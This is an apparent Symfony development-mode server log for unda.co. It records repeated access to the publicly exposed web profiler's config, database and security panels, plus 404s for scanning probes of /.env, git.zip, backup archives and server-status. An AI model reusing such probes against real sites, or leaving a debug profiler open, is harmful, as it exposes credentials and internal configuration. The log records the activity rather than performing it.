[2025-12-17 21:30:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-17 21:38:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8cbb1b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/8cbb1b?panel=twig","method":"GET"} []
[2025-12-17 21:38:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 21:48:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d06d99","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d06d99?panel=validator","method":"GET"} []
[2025-12-17 21:48:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-17 21:49:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5b9b7e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5b9b7e?panel=security","method":"GET"} []
[2025-12-17 21:49:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 21:50:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 21:50:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 21:50:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 21:50:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 21:50:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 21:50:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 21:50:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 21:50:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 21:50:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 22:00:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=config","method":"GET"} []
[2025-12-17 22:00:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 22:00:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5b9b7e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5b9b7e?panel=request","method":"GET"} []
[2025-12-17 22:00:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 22:02:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 22:04:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"411235","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/411235?panel=events","method":"GET"} []
[2025-12-17 22:04:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-17 22:04:29] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-17 22:04:29] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 22:04:29] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 22:04:29] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 22:04:29] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 22:04:29] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 22:04:29] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 22:04:30] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-17 22:08:23] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-17 22:09:06] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"b86c15","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/b86c15","method":"GET"} []
[2025-12-17 22:12:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f750b2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f750b2?panel=validator","method":"GET"} []
[2025-12-17 22:12:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-17 22:12:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7300e2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7300e2?panel=time","method":"GET"} []
[2025-12-17 22:12:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 22:14:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7edbd1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/7edbd1?panel=validator","method":"GET"} []
[2025-12-17 22:14:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-17 22:23:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5b9b7e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5b9b7e?panel=config","method":"GET"} []
[2025-12-17 22:23:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 22:24:09] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"7b38c1","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/7b38c1","method":"GET"} []
[2025-12-17 22:29:12] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FComponent%2FSecurity%2FCore%2FAuthorization%2FVoter%2FAuthenticatedVoter.php&line=26","method":"GET"} []
[2025-12-17 22:29:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"039982","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/039982?group=1&panel=db","method":"GET"} []
[2025-12-17 22:29:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
[2025-12-17 22:34:24] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 22:35:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5b9b7e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5b9b7e?panel=cache","method":"GET"} []
[2025-12-17 22:35:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 22:36:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9727b6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/9727b6?panel=config","method":"GET"} []
[2025-12-17 22:36:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 22:45:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=logger","method":"GET"} []
[2025-12-17 22:45:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-17 22:45:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5b9b7e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5b9b7e","method":"GET"} []
[2025-12-17 22:45:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 22:56:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5b9b7e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5b9b7e?panel=twig","method":"GET"} []
[2025-12-17 22:56:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 23:02:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=request","method":"GET"} []
[2025-12-17 23:02:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 23:05:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"55fc44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/55fc44?panel=db","method":"GET"} []
[2025-12-17 23:05:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-17 23:10:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 23:10:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7300e2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7300e2?panel=request","method":"GET"} []
[2025-12-17 23:10:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 23:14:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=events","method":"GET"} []
[2025-12-17 23:14:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-17 23:15:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=form","method":"GET"} []
[2025-12-17 23:15:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-17 23:18:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a7fe89","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a7fe89?panel=dump","method":"GET"} []
[2025-12-17 23:18:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-17 23:27:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e3caa0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e3caa0","method":"GET"} []
[2025-12-17 23:27:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 23:28:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest","method":"GET"} []
[2025-12-17 23:28:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 23:34:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /atom.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /atom.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 23:40:32] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-17 23:40:32] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 23:40:32] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 23:40:32] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 23:40:32] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 23:40:32] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 23:40:32] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 23:41:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /remote/login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /remote/login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 23:41:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 23:41:59] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 23:47:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?ip=189.172.51.0&limit=10","method":"GET"} []
[2025-12-17 23:47:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.51.0&limit=10","method":"GET"} []
[2025-12-17 23:50:48] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 23:50:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 23:50:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 23:50:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 23:50:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 23:53:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c98e4d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c98e4d?panel=form","method":"GET"} []
